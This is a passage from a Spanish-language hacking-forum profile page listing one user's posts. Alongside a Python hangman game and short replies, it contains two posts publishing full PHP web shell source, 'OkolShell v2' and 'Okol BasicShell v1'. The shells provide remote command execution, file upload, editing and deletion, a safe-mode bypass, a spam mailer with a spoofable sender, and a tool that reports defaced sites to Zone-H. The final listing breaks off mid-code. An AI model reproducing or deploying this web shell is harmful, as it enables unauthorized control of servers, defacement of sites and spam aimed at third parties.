Muy bueno tu aporte, lo único es que concuerdo con 2facer, deberías comenzar a usar funciones; Es más sencillo y mucho más ordenado.
Saludos hermano.
Saludos hermano.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Python / Re:Jugando ahorcado con Python
Febrero 21, 2013, 05:40:03 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaOk brother lo tomaré en cuenta.
Sugerencia okolcito seria bueno que en la proxima version leas las palabras desde un archivo.
Y Segundo maneja tus variables en Inglespor costumbre lo digo
Regards,
Snifer
Gracias.
#3
Python / Jugando ahorcado con Python
Febrero 21, 2013, 05:12:36 PM
Hola amigos, hace unos días junto con un amigo nos pusimos a programar un juego de ahorcado.
espero lo disfruten, son dos archivos.
Sources:
archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: python
Archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código: python
espero lo disfruten, son dos archivos.
Sources:
archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
mono = [
'''
+------------+
| |
|
|
|
|
|
|
|
|
|
|
+------------------+
|//////////////////|
''',
'''
+------------+
| |
| / \\
| \\ /
|
|
|
|
|
|
|
|
+------------------+
|//////////////////|
''',
'''
+------------+
| |
| / \\
| \\ /
| |
| |
| |
| |
| |
|
|
|
+------------------+
|//////////////////|
''',
'''
+------------+
| |
| / \\
| \\ /
| |
| /|
| / |
| / |
| |
|
|
|
+------------------+
|//////////////////|
''',
'''
+------------+
| |
| / \\
| \\ /
| |
| /|\\
| / | \\
| / | \\
| |
|
|
|
+------------------+
|//////////////////|
''',
'''
+------------+
| |
| / \\
| \\ /
| |
| /|\\
| / | \\
| / | \\
| |
| /
| /
| /
+------------------+
|//////////////////|
''',
'''
+------------+
| |
| / \\
| \\ /
| |
| /|\\
| / | \\
| / | \\
| |
| / \\
| / \\
| / \\
+------------------+
|//////////////////|
'''
]
if __name__ == '__main__':
for i in range(len(mono)):
print mono[i]Archivo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#Okol & Developingo
import mono
from random import choice
lista_palabras = {
'cpu': 'Unidad central de procesamiento',
'sqli':'Es un error que te permite ejecutar consultas a la base de datos',
'php':'lenguaje de programacion para crear webs dinamicas',
'ruby on rails':'framework web de ruby',
'perl':'papa de PHP',
'django':'framework web de python',
'print':'funcion para imprimir en pantalla en casi cualquier lenguaje de scripting'
}
print """
Vamos a jugar ahorcado!!
Listo?
"""
raw_input('Enter para comenzar!')
palabra = choice(lista_palabras.keys())
intentos_lista = ['_']*len(palabra)
intentos_malos = 0
primer_juego = True
while True:
s = ''
for i in intentos_lista:
s += i+','
print s[:-1] #Imprimir la lista con la palabra del usuario
print mono.mono[intentos_malos]
if primer_juego:
print lista_palabras[palabra]
primer_juego = False
intento = raw_input('Intenta: ')
if intento == palabra:
print "Felicidades!! ganaste!!"
print 'La palabra es', palabra
break
elif intento in palabra and len(intento)==1:
for i in range(len(palabra)): #Reemplazar las letras
if palabra[i] == intento:
intentos_lista[i] = intento
#Comprobar que no haya ganado
for i in intentos_lista:
if i == '_':
break
else:
print "Felicidades!! ganaste!!"
print 'La palabra es', palabra
break
else:
intentos_malos += 1
if intentos_malos == 6:
print "PERDISTE!!"
print mono.mono[6]
break
print 'Ups te quedan', 6-intentos_malos, 'intentos'
print "FIN"
#4
Underc0de / Re:Crea tu propio servicio para underc0de!
Enero 28, 2013, 09:39:50 PMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaque fresa me haras que troyanise el script de alguien mas xP
Haremos algo mas facil, no subiremos ningun servicio tuyo y listo! xD
Una comunidad es para hacer crecer conocimientos y apoyarnos entre nosotros.
que molesto es que quieras sentirte superior a todos.
#5
Back-end / Re:evitar injeccion SQL
Enero 27, 2013, 09:58:57 PM
Muy interesante éste debate.
Muchas gracias Xt3mP Alex y 2Fac3r.
Muchas gracias Xt3mP Alex y 2Fac3r.
#6
Underc0de / Re:UCodificator Servicio Online
Enero 27, 2013, 09:55:41 PM
MD5 Generator, sistema que convierte un string en un hash de MD5..
Eso dice. deberían corregir.
Eso dice. deberían corregir.
#7
Dudas y pedidos generales / Re:Safe mode on byppas
Enero 27, 2013, 09:48:00 PM
¿Qué versión de php tiene?
#8
Shells / Re:OkolShell v2
Enero 27, 2013, 02:06:00 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuentaUn gustazo verte de nuevo por acá mi hermano.
ya con solo ver el titulo te dan ganas de entrar a ver el post,
un aportazo! como todos tus aportes, se agradece.
saludos!
Un saludo y un abrazo muy grande.
Saludos.
#9
Back-end / Re:evitar injeccion SQL
Enero 27, 2013, 01:20:36 AMNo tienes permitido ver los links. Registrarse o Entrar a mi cuenta+1 mi bro 2Fact3R
Aclarar que cuando uno se refiere a MySQLi es a la extensión MySQL improved no a la inyección.
Por el momento tengo entendido que PDO no es "bypasseable", aunque no estoy muy avanzado en su manejo, se supone que es para la seguridad en consultas de bases de datos.
Zalu2
Si no saben de lo que se habla en el tema no se quieran lucir.
#10
Shells / OkolShell v2
Enero 27, 2013, 12:59:31 AM
Hola amigos, ahora les vengo anunciando la V2 de la OkolShell, Dispone de nuevas mejoras.
¿Cuales son?
-Bug Fixes.
-Adición de un panel de administración.
-Navegación de directorios.
-Un Diseño más amigable y ordenado.
Decidí quitar el safe mode bypass ya que la mayoría sabe bypassearlo.
Cualquier asunto por MP.
Les dejo unas fotos:
*La contraseña por defecto es: pass.
Source:
Código: php
Saludos.
Special Greetz: artshu | Kid_Goth.
¿Cuales son?
-Bug Fixes.
-Adición de un panel de administración.
-Navegación de directorios.
-Un Diseño más amigable y ordenado.
Decidí quitar el safe mode bypass ya que la mayoría sabe bypassearlo.
Cualquier asunto por MP.
Les dejo unas fotos:
*La contraseña por defecto es: pass.
Source:
<?php
session_start();
?>
<style type="text/css">
table {
border-collapse: collapse;
border: 1px solid #03476F;
font: normal 11px verdana, arial, helvetica, sans-serif;
color: #363636;
background: #92C428;
}
caption {
text-align: center;
font: bold 18px arial, helvetica, sans-serif;
background: transparent;
padding:6px 4px 8px 0px;
color: #03476F;
text-transform: uppercase;
}
td, th {
border: 1px dotted #03476F;
padding: .4em;
color: #363636;
}
thead th, tfoot th {
font: bold 11px verdana, arial, helvetica, sans-serif;
border: 1px solid #03476F;;
text-align: left;
background: #4591AD;
color: #FFFFFF;
padding-top:3px;
}
tbody td a {
background: transparent;
text-decoration: none;
color: #363636;
}
tbody td a:hover {
background: #C2F64D;
color: #363636;
}
tbody th a {
font: normal 11px verdana, arial, helvetica, sans-serif;
background: transparent;
text-decoration: none;
font-weight:normal;
color: #363636;
}
tbody th a:hover {
background: transparent;
color: #363636;
}
tbody th, tbody td {
vertical-align: top;
text-align: left;
}
tfoot td {
border: 1px solid #03476F;
background: #4591AD;
padding-top:3px;
color: #FFFFFF;
}
.odd {
background: #AEE239;
}
tbody tr:hover {
background: #FFD800;
border: 1px solid #03476F;
color: #FFFFFF;
}
tbody tr:hover th,
tbody tr.odd:hover th {
background: #FFD800;
color: #FFFFFF;
}
input, textarea { background-color: #000; color: #0F0; padding: 5px; font-size: 15px; }
</style>
<body bgcolor="Black" Text="green" alink="green" blink="green" link="green">
<title>OkolShell v2</title>
<center><pre style="color: green; text-shadow: 0px 0px 8px yellow;">
<big>
________ __ .__ _________.__ .__ .__ ________
\_____ \ | | ______ | | / _____/| |__ ____ | | | | ___ _\_____ \
/ | \| |/ / _ \| | \_____ \ | | \_/ __ \| | | | \ \/ // ____/
/ | \ < <_> ) |__/ \| Y \ ___/| |_| |__ \ // \
\_______ /__|_ \____/|____/_______ /|___| /\___ >____/____/ \_/ \_______ \
\/ \/ \/ \/ \/ \/
<?php echo "<font size='2'>".shell_exec('uname -a');
echo '<font size="2" color="red">usuario </font><font size="2">'. shell_exec('id');
echo '<font size="2" color="red">PHP Version </font><font size="2">'. phpversion().'<br>';
echo '<font size="2" color="red">Safe Mode </font><font size="2" color="gray">'. $safe_mode = @ini_get("safe_mode")?'<font color="red">ON</font>':'<font color="green">OFF</font>'; $safe_mode;
echo '</pre><tr></tr>';
?>
</pre></center><br /><br /></big></span>
<center>
<?php
@set_magic_quotes_runtime(0);
if(@$_SESSION['okol'] != 'logged'){
if(isset($_POST['asdd']) && $_POST['asd'] == 'pass'){
$_SESSION['okol'] = 'logged';
echo '<script>window.location="?";</script>';
}
?>
<form action="" method="POST">
<input type="pass" name="asd" />
<input type="submit" name="asdd" value="Logear" style="color: green; text-shadow: 0px 0px 8px yellow;"/>
</form>
<?php
die();
}
$sec = @$_GET['sec'];
if($sec == 'mail'){
?>
<h3>Mailer</h3>
<form method="post" action="">
Desde:<input type="text"name="from"><br /><br />
Asunto<input type="text"name="asunto"><br /><br />
Numero De Mensajes<input type="text"name="num"><br /><br />
Para:<textarea name="para"></textarea><br>
[*]Si son varios mails separalos por coma...<br><br />
Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
<center><input type="submit" value="Spam!" name="spam"><br /></center>
</form>
<?php
if(isset($_POST['spam'])){
$desde = $_POST['from'];
$para= $_POST['para'];
$cont= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
$lol=$lol + 1;
mail($para,$asunto,$cont,'From:'.$desde);
}
if(mail($para,$asunto,$cont,'From:'.$desde))
{
echo'<>Enviado Correctamente!<br>';
}else{
echo '<center>No se pudo enviar el mensaje<br>';
}
}
}elseif ($sec == 'reportzone') {
?>
<h3>Zone-H Reporter</h3>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
url1:<br><input type="text" name="report" value="http://"><br>
url2:<br><input type="text" name="report1" value="http://"><br>
url3:<br><input type="text" name="report2" value="http://"><br>
url4:<br><input type="text" name="report3" value="http://"><br>
url5:<br><input type="text" name="report4" value="http://"><br>
url6:<br><input type="text" name="report5" value="http://"><br>
url7:<br><input type="text" name="report6" value="http://"><br>
url8:<br><input type="text" name="report7" value="http://"><br>
url9:<br><input type="text" name="report8" value="http://"><br>
url10:<br><input type="text" name="report9" value="http://"><br>
nick: <br><input type="text" name="nick"><br>
<input type="submit" value="Reportar">
</form>
<?php
if(isset($_POST['report']))
{
@$defacer = htmlentities($_POST['nick']);
@$url = htmlentities($_POST['report']);
@$url2 = htmlentities($_POST['report1']);
@$url3 = htmlentities($_POST['report2']);
@$url4 = htmlentities($_POST['report3']);
@$url5 = htmlentities($_POST['report4']);
@$url6 = htmlentities($_POST['report5']);
@$url7 = htmlentities($_POST['report6']);
@$url8 = htmlentities($_POST['report7']);
@$url9 = htmlentities($_POST['report8']);
@$url10 = htmlentities($_POST['report9']);
function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
{
$ch = curl_init("http://zone-h.com/notify/mass");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
curl_exec($ch);
curl_close($ch);
}
ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","6","7");
}
}elseif ($sec == 'ejec') {
?>
<form method="POST" action="">
<h3>Comando a ejecutar</h3><br />
<input type="text" name="ejec"><br />
<input type="submit" value="Ejecutar"><br />
</form>
<?php
echo '<textarea cols="70" rows="10">';
echo @shell_exec($_POST['ejec']);
echo '</textarea>';
}elseif ($sec == 'crypt') {
?>
<h3>Cifrar y Descifrar</h3>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
Ingrese texto a Desencriptar:<br>
<input type="text" name="decript64"><br>
<input type="submit" value="Desencriptar">
</form>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
Ingrese texto a encriptar:<br>
<input type="text" name="encript64"><br>
<input type="submit" value="Encriptar"><br /><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
Encriptar en MD5<br />
<input type="text" name="md5en">
<input type="submit" value="encriptar"><br>
</form>
<?php
#encript b64
function base64en(){
$encript = base64_encode($_POST['encript64']);
echo $encript.'<br>';
}
#Decript b64
function base64de(){
$decript = base64_decode($_POST['decript64']);
echo $decript.'<br>';
}
#encript Md5
function md5encript(){
$encriptmd5 = md5($_POST['md5en']);
echo $encriptmd5.'<br>';
}
if(isset($_POST['encript64'])){
base64en();
}
if(isset($_POST['decript64'])){
base64de();
}
if(isset($_POST['md5en'])){
md5encript();
}
}elseif ($sec == 'mysqlsen') {
?>
<form method="POST" action="">
<h3>Sentencias Mysql</h3><br>
Host:<input type="text" name="host">
User:<input type="text" name="user">
Password:<input type="text" name="password"><br>
DB:<input type="text" name="database">
Query: <input type="text" name="query">
<input type="submit" value="Ejecutar" name="mysqlsentencia">
</form>
<?php
if(isset($_POST['query'])){
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['password'];
$query = $_POST['query'];
$db = $_POST['database'];
$con = mysql_connect($host, $user, $pass);
echo mysql_error()?"Error: " . mysql_error():"Conectado con exito\n";
mysql_select_db($db, $con);
echo mysql_error()?"Error: " . mysql_error():"DB seleccionada con exito\n\n";
$resultado = mysql_query($query);
if($result)
{
while($line = mysql_fetch_array($result,MYSQL_ASSOC))
{
print_r ($line);
}
}
}
}
?>
<a href="?sec=mail">Mailer</a><br>
<a href="?sec=reportzone">Zone-H Reporter</a><br>
<a href="?sec=ejec">Ejecutar comandos</a><br>
<a href="?sec=crypt">Zone Crypter (Md5 y Base64)</a><br>
<a href="?sec=mysqlsen">Mysql Sentences</a><br>
<form action="" method="post" enctype="multipart/form-data">
<h3 style="color: green; text-shadow: 0px 0px 2px green;">Enviar un nuevo archivo: </h3>
<br>
<input name="banner" type="file">
<br>
<input type="submit" value="Enviar" name="subir">
</form>
<?php
if(isset($_GET['del']) & @$_GET['file'] != ""){
unlink($_GET['file']);
echo '<script>window.location="?";</script>';
}
if(isset($_POST['subir'])){
$path= $_GET['dir'];
$nombreArch=$_FILES['banner']['name'];
if (is_uploaded_file($_FILES['banner']['tmp_name']))
{
move_uploaded_file($_FILES['banner']['tmp_name'], $path."/".$nombreArch);
echo "El archivo se ha subido correctamente al servidor, muchas gracias <p>";
}
else {
echo "Error al subir el archivo ";
echo $path."/".$archivo."";
}
}
if($sec = 'menu'){
@$file = htmlentities($_GET['file']);
@$sec = $_GET['sec'];
}
$directorio = isset($_GET['dir'])?$_GET['dir']:"/";
function permisos($permiso){
//Sacado de php.net :)
$permisos = @fileperms($permiso);
if (($permisos & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($permisos & 0xA000) == 0xA000) {
// Enlace Simbólico
$info = 'l';
} elseif (($permisos & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($permisos & 0x6000) == 0x6000) {
// Especial Bloque
$info = 'b';
} elseif (($permisos & 0x4000) == 0x4000) {
// Directorio
$info = 'd';
} elseif (($permisos & 0x2000) == 0x2000) {
// Especial Carácter
$info = 'c';
} elseif (($permisos & 0x1000) == 0x1000) {
// TuberÃa FIFO
$info = 'p';
} else {
// Desconocido
$info = 'u';
}
// Propietario
$info .= (($permisos & 0x0100) ? 'r' : '-');
$info .= (($permisos & 0x0080) ? 'w' : '-');
$info .= (($permisos & 0x0040) ?
(($permisos & 0x0800) ? 's' : 'x' ) :
(($permisos & 0x0800) ? 'S' : '-'));
// Grupo
$info .= (($permisos & 0x0020) ? 'r' : '-');
$info .= (($permisos & 0x0010) ? 'w' : '-');
$info .= (($permisos & 0x0008) ?
(($permisos & 0x0400) ? 's' : 'x' ) :
(($permisos & 0x0400) ? 'S' : '-'));
// Mundo
$info .= (($permisos & 0x0004) ? 'r' : '-');
$info .= (($permisos & 0x0002) ? 'w' : '-');
$info .= (($permisos & 0x0001) ?
(($permisos & 0x0200) ? 't' : 'x' ) :
(($permisos & 0x0200) ? 'T' : '-'));
return $info;
}
if($file == ""){
echo '<table border="1"> <tr> <th ><font color="gray">archivos</font></th>';
echo '<th><font color="gray">Tamaño</th></font>';
echo '<th><font color="gray">Tipo</th></font>';
echo '<th><font color="gray">Permisos</th></tr></font>';
$files = @scandir($directorio) or die('No existe el directorio que buscas');
for ($i=0; $i < count($files); $i++) {
if($files[$i] != "." && $files[$i] != ".."){
$cat = is_file($directorio."/".$files[$i])?"file":"dir";
chdir($directorio);
echo "<tr><td><a href='?".$cat."=" .$directorio."/".$files[$i]."''>".$files[$i]."</a></td>";
echo '<td>'. @filesize($files[$i]).' KB</td>';
echo '<td>'. @filetype($files[$i]).'</td>';
echo '<td>'. permisos($files[$i]).'</td>';
echo "<td><a href='?del&file=$directorio/$files[$i]'>Eliminar</a></td></tr>";
}
}
echo '</table>';
echo '<form method="GET" action=""> ';
echo '<input type="text" name="dir" value="'.$_SERVER['DOCUMENT_ROOT'].'"> ';
echo '<input type="Submit" value="navegar"> ';
echo '<td>';
if(isset($_GET['dela']) && $_GET['dela'] != ''){
chdir($directorio);
unlink($archel);
}
}else{
if(isset($_POST['enviar'])){
$fp=fopen("$file", "w+");
fputs($fp, $_POST['contenido']);
@fclose($fp);
echo 'Editado';
}
if(is_file($file))
{
$fp = @fopen("$file", 'r');
$cont = @fread($fp, filesize($file))or die('No se puede editar.');
$cont = $cont;
@fclose($fp);
echo "<form action='' method='POST'> ";
echo "<textarea name='contenido' cols= '60' rows='20'>".htmlentities($cont)."</textarea><br> ";
echo "<input type='submit' value='Editar' name='enviar'><br> ";
echo "</form>";
echo '<button onClick="history.go(-1)">Atras</button>';
}
}
?>
</form>
<h3 color="green">Crear archivo:</h3><br><br>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
Nombre del archivo<br />
<input type="text" name="archivo"><br /><br>
Codigo<br />
<textarea name="contenido2" cols="60" rows="15"></textarea><br />
<input type="submit" value="crear" name="Mod"><br />
</form>
<?php
if(isset($_POST['archivo'])){
$contenido = $_POST['contenido2'];
$nombre = $_POST['archivo'];
$crear = @fopen($nombre,'w+');
@fwrite($crear, $contenido);
@fclose($crear);
echo 'El archivo se ha creado correctamente.';
}
?>
</center>
Saludos.
Special Greetz: artshu | Kid_Goth.
#11
Diseño UX/UI / Re:Cronos Vs. Kodeinfect [VOTACION]
Enero 20, 2013, 02:35:21 PM
Dios mio, están demasiado chulos.
Creo que me quedaría con el de Cronos aunque el de kodeinfect es muy bueno.
Saludos.
Creo que me quedaría con el de Cronos aunque el de kodeinfect es muy bueno.
Saludos.
#13
Dudas y pedidos generales / Re:[Ayuda] donde guardo los exploits en metasploit?
Enero 16, 2013, 06:18:16 PM
Metasploit se puede instalar satisfactoriamente en cualquier distro de linux y en windows.
Backtrack es un root que tiene las tools instaladas, pero tu puedes instalarlas sin ningun problema.
Backtrack es un root que tiene las tools instaladas, pero tu puedes instalarlas sin ningun problema.
#14
Shells / Okol BasicShell v1
Enero 16, 2013, 05:09:29 PM
Hola amigos, espero se encuentren bien.
he estado trabajando en esté proyecto alrededor de tres días, es una shell (Basica).
espero la disfruten y pues cualquier cosa pueden decirla.
Funciones:
-Subir archivos
-Eliminar, crear y modificar archivos.
-Ejecución de comandos en el sistema.
-Bypass Safemode
-Listado de archivos en el directorio.
-Mysql query's
-Encriptar y desencriptar en base64
-Encriptar en MD5
-Zone-h Reporter
-Mailer.
*El servidor no debe tener desactivada la función system()
Espero les pueda servir para algo.
Saludos comunidad.
Source:
Código: php
he estado trabajando en esté proyecto alrededor de tres días, es una shell (Basica).
espero la disfruten y pues cualquier cosa pueden decirla.
Funciones:
-Subir archivos
-Eliminar, crear y modificar archivos.
-Ejecución de comandos en el sistema.
-Bypass Safemode
-Listado de archivos en el directorio.
-Mysql query's
-Encriptar y desencriptar en base64
-Encriptar en MD5
-Zone-h Reporter
-Mailer.
*El servidor no debe tener desactivada la función system()
Espero les pueda servir para algo.
Saludos comunidad.
Source:
<title>BasicShell</title>
<h1>BasicShell Okol</h1>
<font size="2" color="red">Uname</font><font size="2" color="gray"> <?php system('uname -a'); ?></font><br />
<font size="2" color="red">usuario</font><font size="2" color="gray"> <?php system('id'); ?></font><br />
<font size="2" color="red">PHP Version</font><font size="2" color="gray"> <?php echo phpversion();?></font><br />
<font size="2" color="red">Tu IP</font><font size="2" color="gray"> <?php ECHO $_SERVER['REMOTE_ADDR']; ?></font><br />
<font size="2" color="red">Safe Mode</font><font size="2" color="gray"> <?php $safe_mode = @ini_get('safe_mode')?'<font color="red">ON</font>':'<font color="green">OFF</font>'; echo $safe_mode; ?></font><br /><br />
<font size="2">
<style type="text/css">
input[type='text'] { color: red; width:100px;height:20px;background-color:gray;color:yellow;font-size:10pt; font-family:Verdana;text-align:center}
</style>
<style type="text/css">
textarea{ color: red;width:350px;height:150px;font-size:12px;font-family:Helvetica;background-color:gray;color:yellow;}
</style>
<style type="text/css">
input[type='submit'] { color: red; width:100px;height:20px;background-color:red;color:yellow;font-size:7pt; font-family:Verdana;text-align:center}
</style>
<style type="text/css">
body { background-color: #000; color: #F80; text-align: center;size:12px; }
img { width: 18px; height: 18px; }
a { color: #000; text-decoration: none; font-family:Helvetica; size: 9px; }
td { padding-left: 20px; text-align: justify; }
</style>
<form action="<?php basename($_SERVER['PHP_SELF']); ?>" method="post" enctype="multipart/form-data">
<h3>Enviar un nuevo archivo: </h3>
<br>
<input name="userfile" type="file">
<br>
<input type="submit" value="Enviar" name="subir">
</form>
<h3>eliminar archivo<br />
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="archivoaeliminar">
<input type="submit" value="Eliminar">
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
<h3>Comando a ejecutar</h3><br />
<input type="text" name="ejec"><br />
<input type="submit" value="Ejecutar"><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
<h3>Bypass Safemode</h3><br>
<input type="submit" name="safemode" value="Bypass safemode">
</form>
<?php
echo '<h3>Los archivos en el directorio son:</h3><br>';
#Listado de archivos
if ($gestor = opendir('.')) {
while (false !== ($entrada = readdir($gestor))) {
if ($entrada != "." && $entrada != "..") {
echo '<pre>';
echo "$entrada\n";
echo '</pre>';
}
}
closedir($gestor);
}
?>
<h3>Modificar un archivo existente:</h3>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
Nombre de archivo a modificar:<br>
<input type="text" name="archmod" value="index.php" >
<input type="submit" name="modificar" value="Abrir archivo"><br><br>
Codigo<br>
<textarea name="contenido" cols="80" rows="15">
<?php
if(isset($_POST['archmod']) && $_POST['archmod'] != "")
{
echo abrirarchivo($_POST['archmod']);
}
?>
</textarea><br />
<input type="submit" name="modificar" value="Guardar cambios"><br>
</form>
<h3>Crear archivo:</h3><br><br>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
Nombre del archivo<br />
<input type="text" name="archivo"><br /><br>
Codigo<br />
<textarea name="contenido2" cols="60" rows="15"></textarea><br />
<input type="submit" value="crear" name="Mod"><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']); ?>">
<h3>Sentencias Mysql</h3><br>
Host:<input type="text" name="host">
User:<input type="text" name="user">
Password:<input type="text" name="password"><br>
DB:<input type="text" name="database">
Query: <input type="text" name="query">
<input type="submit" value="Ejecutar" name="mysqlsentencia">
</form>
<h3>Cifrar y Descifrar</h3>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
Ingrese texto a Desencriptar:<br>
<input type="text" name="decript64"><br>
<input type="submit" value="Desencriptar">
</form>
<form method="POST" action ="<?php basename($_SERVER['PHP_SELF']) ?>">
Ingrese texto a encriptar:<br>
<input type="text" name="encript64"><br>
<input type="submit" value="Encriptar"><br /><br />
</form>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
Encriptar en MD5<br />
<input type="text" name="md5en">
<input type="submit" value="encriptar"><br>
</form>
<h3>Zone-H Reporter</h3>
<form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
url1:<br><input type="text" name="report" value="http://"><br>
url2:<br><input type="text" name="report1" value="http://"><br>
url3:<br><input type="text" name="report2" value="http://"><br>
url4:<br><input type="text" name="report3" value="http://"><br>
url5:<br><input type="text" name="report4" value="http://"><br>
url6:<br><input type="text" name="report5" value="http://"><br>
url7:<br><input type="text" name="report6" value="http://"><br>
url8:<br><input type="text" name="report7" value="http://"><br>
url9:<br><input type="text" name="report8" value="http://"><br>
url10:<br><input type="text" name="report9" value="http://"><br>
nick: <br><input type="text" name="nick"><br>
<input type="submit" value="Reportar">
</form></center>
<h3>Mailer</h3>
<form method="post" action="<?php basename($_SERVER['PHP_SELF']) ?>">
Desde:<input type="text"name="from"><br /><br />
Asunto<input type="text"name="asunto"><br /><br />
Numero De Mensajes<input type="text"name="num"><br /><br />
Para:<textarea name="para"></textarea><br>
[*]Si son varios mails separalos por coma...<br><br />
Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
<center><input type="submit" value="Spam!" name="spam"><br /></center>
</form>
<?php
@set_magic_quotes_runtime(0);
#Ejecutar comando
function ejecutaros(){
echo '<textarea cols="70" rows="10">';
$ejec = @system($_POST['ejec']);
echo '</textarea>';
}
#crear archivo
function crear(){
$contenido = $_POST['contenido2'];
$nombre = $_POST['archivo'];
$crear = @fopen($nombre,'w+');
@fwrite($crear, $contenido);
@fclose($crear);
echo 'El archivo se ha creado correctamente.';
}
#Bypass safe mode
function bysafemode(){
$sacrear = fopen("php.ini",'w+');
fwrite($sacrear, 'safe_mode = Off ');
fclose($sacrear);
system('chmod 777 php.ini');
}
#Subir archivo
function subir(){
$allowed_ext = "rar,jpg,php,png,txt,html,zip,pl,py,mp3,c";
$overwrite = "no";
$match = "";
$filesize = $_FILES['userfile']['size'];
$filename = strtolower($_FILES['userfile']['name']);
if($filesize < 1){
@$error .= "- Archivo vacío.<br>";
}
$file_ext = preg_split("/\./",$filename);
$allowed_ext = preg_split("/\,/",$allowed_ext);
foreach($allowed_ext as $ext){
if($ext==$file_ext[1]) $match = "1";
}
if(@$error){
print "Se ha producido el siguiente error al subir el archivo:<br> $error";
}else{
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $filename)){
print "<b>$filename</b> se ha subido correctamente!";
}
}
}
#Mysql Query
function mysqlsen(){
$host = $_POST['host'];
$user = $_POST['user'];
$pass = $_POST['password'];
$query = $_POST['query'];
$db = $_POST['database'];
$con = mysql_connect($host, $user, $pass);
echo mysql_error()?"Error: " . mysql_error():"Conectado con exito\n";
mysql_select_db($db, $con);
echo mysql_error()?"Error: " . mysql_error():"DB seleccionada con exito\n\n";
$resultado = mysql_query($query);
if($result)
{
while($line = mysql_fetch_array($result,MYSQL_ASSOC))
{
print_r ($line);
}
}
//while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
//mysql_free_result($result);
//die;
}
function abrirarchivo($arc)
{
$archivo = @file_get_contents($arc);
$archivo = ucfirst($archivo);
return htmlentities(@$archivo);
}
#encript b64
function base64en(){
$encript = base64_encode($_POST['encript64']);
echo $encript;
}
#Decript b64
function base64de(){
$decript = base64_decode($_POST['decript64']);
echo $decript;
}
#encript Md5
function md5encript(){
$encriptmd5 = md5($_POST['md5en']);
echo $encriptmd5;
}
#Eliminar archivos
function eliminararch(){
$eliminar = $_POST['archivoaeliminar'];
@unlink($eliminar);
}
if(isset($_POST['contenido2'])){
crear();
}
if(isset($_POST['ejec'])){
ejecutaros();
}
if(isset($_POST['safemode'])){
bysafemode();
}
if(isset($_POST['subir'])){
subir();
}
if(isset($_POST['mysqlsentencia'])){
mysqlsen();
}
if(isset($_POST['encript64'])){
base64en();
}
if(isset($_POST['decript64'])){
base64de();
}
if(isset($_POST['md5en'])){
md5encript();
}
if(isset($_POST['archivoaeliminar'])){
eliminararch();
}
if(isset($_POST['report']))
{
@$defacer = htmlentities($_POST['nick']);
@$url = htmlentities($_POST['report']);
@$url2 = htmlentities($_POST['report1']);
@$url3 = htmlentities($_POST['report2']);
@$url4 = htmlentities($_POST['report3']);
@$url5 = htmlentities($_POST['report4']);
@$url6 = htmlentities($_POST['report5']);
@$url7 = htmlentities($_POST['report6']);
@$url8 = htmlentities($_POST['report7']);
@$url9 = htmlentities($_POST['report8']);
@$url10 = htmlentities($_POST['report9']);
function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
{
$ch = curl_init("http://zone-h.com/notify/mass");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
curl_exec($ch);
curl_close($ch);
}
ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","6","7");
}
if(isset($_POST['spam'])){
$desde = $_POST['from'];
$para= $_POST['para'];
$cont= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
$lol=$lol + 1;
mail($para,$asunto,$cont,'From:'.$desde);
}
if(mail($para,$asunto,$cont,'From:'.$desde))
{
echo'<>Enviado Correctamente!<br>';
}else{
